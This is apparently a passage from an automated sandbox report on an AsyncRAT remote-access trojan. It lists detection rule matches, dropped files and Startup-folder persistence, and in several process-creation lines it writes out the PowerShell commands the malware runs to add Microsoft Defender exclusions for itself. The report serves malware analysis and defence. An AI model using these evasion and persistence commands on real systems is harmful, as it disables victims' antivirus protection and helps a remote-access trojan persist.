                              Source: x.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: x.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                              Source: 2.0.x.exe.dc0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                              Source: 2.2.x.exe.30cf840.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                              Source: 2.2.x.exe.30cf840.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                              Source: 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                              Source: 00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                              Source: C:\ProgramData\Java Update Checker (64 bit).exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                              Source: x.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                              Source: x.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                              Source: x.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                              Source: Java Update Checker (64 bit).exe.2.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                              Source: Java Update Checker (64 bit).exe.2.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                              Source: Java Update Checker (64 bit).exe.2.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                              Source: x.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                              Source: x.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: Java Update Checker (64 bit).exe.2.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                              Source: Java Update Checker (64 bit).exe.2.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: MpCmdRun.exe0.0.drBinary string: IdImageFileNameFirst Resource TypeTypeScan SourceFirst Resource PathEngineIdResource CountReasonProcessMessagePIDStartStopDataIsSignedFile\Device\\\?\\FI_UNKNOWN\drivers\error: invalid data: System Windows path changed during the trace from "%ls" to "%ls"
                              Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@23/194@1/2
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update Checker (64 bit).lnkJump to behavior
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5888:120:WilError_03
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeMutant created: \Sessions\1\BaseNamedObjects\2IFtGtBpRNgvGbsg
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_03
                              Source: C:\Windows\svchost.comMutant created: \Sessions\1\BaseNamedObjects\MutexPolesskayaGlush*.* svchost.com n X . t N t h ` T 5 @
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1316:120:WilError_03
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Users\user~1\AppData\Local\Temp\3582-490Jump to behavior
                              Source: x.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.29%
                              Source: C:\Users\user\Desktop\x.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\x.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: integrator.exe.0.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                              Source: integrator.exe.0.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                              Source: integrator.exe.0.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                              Source: integrator.exe.0.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                              Source: x.exeReversingLabs: Detection: 97%
                              Source: x.exeVirustotal: Detection: 93%
                              Source: C:\Users\user\Desktop\x.exeFile read: C:\Users\user\Desktop\x.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\x.exe "C:\Users\user\Desktop\x.exe"
                              Source: C:\Users\user\Desktop\x.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\x.exe "C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe"
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe'
                              Source: C:\Windows\svchost.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe'
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
                              Source: C:\Windows\svchost.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'
                              Source: C:\Windows\svchost.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update Checker (64 bit).exe'
                              Source: C:\Windows\svchost.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update Checker (64 bit).exe'
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\x.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\x.exe "C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe'Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update Checker (64 bit).exe'Jump to behavior
                              Source: C:\Windows\svchost.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe'Jump to behavior
                              Source: C:\Windows\svchost.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
                              Source: C:\Windows\svchost.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'
                              Source: C:\Windows\svchost.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update Checker (64 bit).exe'
                              Source: C:\Users\user\Desktop\x.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: rtutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: sxs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: scrrun.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: linkinfo.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: avicap32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: msvfw32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Windows\svchost.comSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\svchost.comSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
